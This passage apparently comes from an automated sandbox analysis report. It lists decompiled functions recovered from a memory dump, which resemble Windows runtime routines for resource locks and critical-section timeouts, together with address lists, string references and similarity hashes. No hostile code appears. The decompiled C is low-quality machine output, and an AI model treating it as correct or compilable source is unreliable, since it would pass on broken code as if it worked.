										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0077055a
0x0077055d
0x00770563
0x00770566
0x007705d8
0x007705e2
0x007705e5
0x00000000
0x007705e7
0x007705e7
0x007705ea
0x007705f3
0x007705f3
0x00770568
0x00770568
0x00770568
0x00770569
0x00770569
0x00770569
0x0077056b
0x00000000
0x00000000
0x0079217f
0x00792183
0x0079225b
0x0079225f
0x00792189
0x0079218c
0x0079218f
0x00792194
0x00792199
0x0079219d
0x007921a0
0x007921a2
0x007921ce
0x007921ce
0x007921ce
0x007921d0
0x007921d6
0x007921de
0x007921e2
0x007921e8
0x007921e9
0x007921ec
0x007921f1
0x007921f6
0x00000000
0x00000000
0x007921f8
0x007921fb
0x00792206
0x0079220b
0x0079220c
0x00792217
0x00792226
0x0079222b
0x0079222c
0x0079222f
0x00792232
0x00792235
0x00792235
0x0079223a
0x0079223f
0x00792241
0x00792243
0x00792248
0x00792248
0x0079224d
0x0079224f
0x00792262
0x00792263
0x00792268
0x00792269
0x00792269
0x00792269
0x0079226d
0x00000000
0x00000000
0x00792276
0x00792279
0x0079227e
0x00792283
0x00792287
0x0079228a
0x0079228d
0x0079228f
0x007922bc
0x007922bc
0x007922bc
0x007922be
0x007922c4
0x007922cc
0x007922d0
0x007922d6
0x007922d7
0x007922da
0x007922df
0x007922e4
0x00000000
0x00000000
0x007922e6
0x007922e9
0x007922f4
0x007922f9
0x007922fa
0x00792305
0x00792314
0x00792319
0x0079231a
0x0079231d
0x00792320
0x00792323
0x00792323
0x00792328
0x0079232d
0x0079232f
0x00792331
0x00792336
0x00792336
0x0079233b
0x0079233d
0x00792350
0x00792351
0x00792356
0x00792359
0x00792359
0x0079235b
0x0079235d
0x00755367
0x0075536b
0x00755372
0x00000000
0x00000000
0x00000000
0x00000000
0x00792363
0x00792363
0x00792369
0x0079236a
0x0079236c
0x00792371
0x00792373
0x00000000
0x00792379
0x00792379
0x0079237a
0x0079237f
0x0079237f
0x00792385
0x00792386
0x00792389
0x0079238e
0x00792390
0x00755378
0x0075537c
0x00792396
0x00792396
0x00792397
0x0079239c
0x007923a2
0x007923a3
0x007923a6
0x007923ab
0x007923ad
0x00000000
0x007923b3
0x007923b3
0x007923b4
0x007923b9
0x007923ba
0x007923ba
0x007923bc
0x007923bf
0x00000000
0x00000000
0x00789153
0x00789158
0x0078915a
0x0078915e
0x00789160
0x00000000
0x00789166
0x00789166
0x00789171
0x00789176
0x00789176
0x00000000
0x00789160
0x007923c6
0x007923d7
0x007923d7
0x007923ad
0x00792390
0x00792373
0x0079233f
0x0079233f
0x00000000
0x0079233f
0x00792291
0x00792291
0x00792293
0x00792295
0x0079229a
0x007922a1
0x007922a3
0x007922a7
0x007922a9
0x00000000
0x00000000
0x007922ab
0x007922ad
0x007922af
0x00000000
0x00000000
0x00000000
0x007922af
0x007922b1
0x007922b4
0x007922b4
0x007922b6
0x007553be
0x007553be
0x007553be
0x007553c0
0x00000000
0x00000000
0x007553cb
0x007553ce
0x007553d0
0x007553d4
0x007553d6
0x00000000
0x007553d8
0x007553e3
0x007553ea
0x007553ea
0x00000000
0x007553d6
0x00000000
0x00000000
0x00000000
0x00000000
0x007922b6
0x00000000
0x0079228f
0x00792349
0x0079234d
0x00792251
0x00792251
0x00000000
0x00792251
0x007921a4
0x007921a4
0x007921a6
0x007921a8
0x007921ac
0x007921b6
0x007921b8
0x007921bc
0x007921be
0x00000000
0x00000000
0x007921c0
0x007921c2
0x007921c4
0x00000000
0x00000000
0x00000000
0x007921c4
0x007921c6
0x007921c6
0x007921c8
0x00000000
0x00000000
0x00000000
0x00000000
0x007921c8
0x007921a2
0x00000000
0x00792183
0x0077057b
0x0077057d
0x00770581
0x00770583
0x00792178
0x00000000
0x00770589
0x0077058f
0x0077058f
0x00770583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
RTL: Resource at %p, xrefs: 0079221D, 0079230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0079220E
RTL: Re-Waiting, xrefs: 0079223A, 00792328

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
Instruction ID: fbe174005d69523103c40687462872883b2a849454bbf419938160b7b3bbf122
Opcode Fuzzy Hash: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
Instruction Fuzzy Hash: AD514B75740205BBEF14EB18DC85FA673A9AF94710F218229FD48DB287D969EC4287D0

Uniqueness

Uniqueness Score: -1.00%

Function 007714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E007714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x812088; // 0x775ba0a1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00767707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E007713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00767707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00767707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00732340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0073E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x007714c0
0x007714cb
0x007714d2
0x007714d6
0x007714da
0x007714de
0x007714e3
0x0077157a
0x0077157a
0x007714f1
0x007714f3
0x0079ea0f
0x00000000
0x0079ea15
0x00000000
0x0079ea15
0x007714f9
0x007714f9
0x007714fe
0x00771504
0x0079ea1a
0x0079ea1f
0x0079ea21
0x0079ea22
0x0079ea27
0x0079ea2a
0x0079ea2a
0x00771515
0x00771517
0x0077156d
0x00771572
0x00771575
0x00771575
0x0077151e
0x0079ea50
0x0079ea55
0x0079ea58
0x0079ea58
0x0077152e
0x00771531
0x00771533
0x00000000
0x00771535
0x00771541
0x00771549
0x00771549
0x00771533
0x007714f3
0x00771559

APIs

___swprintf_l.LIBCMT ref: 0079EA22

Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 0077146B
Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 00771490

___swprintf_l.LIBCMT ref: 0077156D

Strings

]:%u, xrefs: 0079EA47
%%%u, xrefs: 00771564

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
Instruction ID: d3a778ee60efaa949fd91bc014b9dfe59e3c424b9fb95e479ac8a1f065700a8e
Opcode Fuzzy Hash: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
Instruction Fuzzy Hash: F721C1B29006199BDF24DE68DC45AEE73ACEB50740F848151FD4AD3141EB78AA688BE0

Uniqueness

Uniqueness Score: -1.00%

Function 007553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E007553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008101c0;
									_push(_t92);
									_push(0);
									_t37 = E0072F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00774FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E007B217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00783F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00773915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00755384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0072F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00773915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00773915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00773915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00755329(_t74, _t92);
													_push(1);
													return E007553A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x007553ab
0x007553ae
0x007553b1
0x007553b4
0x007553b7
0x007705b6
0x007705c0
0x007705c3
0x00000000
0x007705c9
0x007705c9
0x007705cc
0x007705d5
0x007705d5
0x007553bd
0x007553bd
0x007553bd
0x007553be
0x007553be
0x007553be
0x007553c0
0x00000000
0x00000000
0x00792269
0x0079226d
0x00792349
0x0079234d
0x00792273
0x00792276
0x00792279
0x0079227e
0x00792283
0x00792287
0x0079228a
0x0079228d
0x0079228f
0x007922bc
0x007922bc
0x007922bc
0x007922be
0x007922c4
0x007922cc
0x007922d0
0x007922d6
0x007922d7
0x007922da
0x007922df
0x007922e4
0x00000000
0x00000000
0x007922e6
0x007922e9
0x007922f4
0x007922f9
0x007922fa
0x00792305
0x00792314
0x00792319
0x0079231a
0x0079231d
0x00792320
0x00792323
0x00792323
0x00792328
0x0079232d
0x0079232f
0x00792331
0x00792336
0x00792336
0x0079233b
0x0079233d
0x00792350
0x00792351
0x00792356
0x00792359
0x00792359
0x0079235b
0x0079235d
0x00755367
0x0075536b
0x00755372
0x00000000
0x00000000
0x00000000
0x00000000
0x00792363
0x00792363
0x00792369
0x0079236a
0x0079236c
0x00792371
0x00792373
0x00000000
0x00792379
0x00792379
0x0079237a
0x0079237f
0x0079237f
0x00792385
0x00792386
0x00792389
0x0079238e
0x00792390
0x00755378
0x0075537c
0x00792396
0x00792396
0x00792397
0x0079239c
0x007923a2
0x007923a3
0x007923a6
0x007923ab
0x007923ad
0x00000000
0x007923b3
0x007923b3
0x007923b4
0x007923b9
0x007923ba
0x007923ba
0x007923bc
0x007923bf
0x00000000
0x00000000
0x00789153
0x00789158
0x0078915a
0x0078915e
0x00789160
0x00000000
0x00789166
0x00789166
0x00789171
0x00789176
0x00789176
0x00000000
0x00789160
0x007923c6
0x007923cb
0x007923d7
0x007923d7
0x007923ad
0x00792390
0x00792373
0x0079233f
0x0079233f
0x00000000
0x0079233f
0x00792291
0x00792291
0x00792293
0x00792295
0x0079229a
0x007922a1
0x007922a3
0x007922a7
0x007922a9
0x00000000
0x00000000
0x007922ab
0x007922ad
0x007922af
0x00000000
0x00000000
0x00000000
0x007922af
0x007922b1
0x007922b4
0x007922b4
0x007922b6
0x00000000
0x00000000
0x00000000
0x00000000
0x007922b6
0x0079228f
0x00000000
0x0079226d
0x007553cb
0x007553ce
0x007553d0
0x007553d4
0x007553d6
0x00000000
0x007553d8
0x007553e3
0x007553ea
0x007553ea
0x007553d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007922F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
RTL: Resource at %p, xrefs: 0079230B
RTL: Re-Waiting, xrefs: 00792328

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
Instruction ID: 617c8ec89938efa80c4a1cb6ff93843e3e6c22bb7d26e354bf558c5284d7d131
Opcode Fuzzy Hash: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
Instruction Fuzzy Hash: BD513B71600701BBDF10AB28DC85FE67398AF55764F114229FD08DB282E6A9ED468790

Uniqueness

Uniqueness Score: -1.00%

Function 0075EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0075EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0074DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x81793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E007316C0(_t39);
				} else {
					_t40 = E0072F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00773915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E007301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x81793c; // 0x0
								_push(_t85);
								_t44 = E00731F28(_t71);
							} else {
								_t44 = E0072F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00773915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E007B2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0075EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00774FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00783F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00783F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x8120c0;
								if(_t85 != 0x8120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E007B217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00783F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0075ec56
0x0075ec56
0x0075ec56
0x0075ec5c
0x0075ec64
0x007923e6
0x007923eb
0x007923eb
0x0075ec6a
0x0075ec6c
0x0075ec6f
0x007923f3
0x007923f8
0x007923fa
0x007923fc
0x0075ec75
0x0075ec76
0x0075ec76
0x0075ec7b
0x0075ec7c
0x0075ec7e
0x00792406
0x00792407
0x0079240c
0x0079240d
0x0079240d
0x0079240d
0x00792414
0x00792417
0x0079241e
0x00792435
0x00792438
0x0079243c
0x0079243f
0x00792442
0x00792443
0x00792446
0x00792449
0x00792453
0x00792455
0x0079245b
0x0079245b
0x0075eb99
0x0075eb99
0x0075eb9c
0x0075eb9d
0x0075eb9f
0x0075eba2
0x00792465
0x0079246b
0x0079246d
0x0075eba8
0x0075eba9
0x0075eba9
0x0075ebae
0x0075ebb3
0x0075ebb9
0x0075ebbb
0x00792513
0x00792514
0x00792519
0x0079251b
0x0075ec2a
0x0075ec2d
0x0075ec33
0x0075ec36
0x0075ec3a
0x0075ec3e
0x0075ec40
0x0075ec47
0x0075ec47
0x0075ec40
0x007322c6
0x0075ebc1
0x0075ebc1
0x0075ebc5
0x0075ec9a
0x0075ec9a
0x0075ebd6
0x0075ebd6
0x00000000
0x0075ebbb
0x00792477
0x0079247c
0x00792486
0x0079248b
0x00792496
0x0079249b
0x0079249d
0x007924a0
0x007924a3
0x007924aa
0x007924aa
0x007924a5
0x007924a5
0x007924a5
0x007924ac
0x007924af
0x007924b0
0x007924b3
0x007924b9
0x007924ba
0x007924bb
0x007924c6
0x007924cb
0x007924cd
0x007924d0
0x007924d1
0x007924d4
0x007924d6
0x007924d9
0x007924d9
0x007924dc
0x007924df
0x007924e1
0x007924e7
0x007924e9
0x007924ec
0x007924ef
0x007924f2
0x007924f2
0x007924ef
0x007924e7
0x007924fa
0x007924ff
0x00792501
0x00792503
0x00792506
0x0079250b
0x0075eb8c
0x0075eb93
0x00000000
0x00000000
0x0075eb93
0x00000000
0x0075eb99
0x0075ec85
0x0075ec85
0x0075ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007924BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0079248D
RTL: Re-Waiting, xrefs: 007924FA

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
Instruction ID: ccecc2dcbb6b071fd3e107c012a6e81c582c39697ccf4ca897e8668307f5a3c1
Opcode Fuzzy Hash: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
Instruction Fuzzy Hash: 7D41D8B0600204FBDB24EB68DC89FAA77B9EF44710F208615F955D72D2D67CED528760

Uniqueness

Uniqueness Score: -1.00%

Function 0076FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0076FD94

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 3c123995bb8216e2d328b87d6bbdc2c6c000a0e32058bc97e5d35d372c73db28
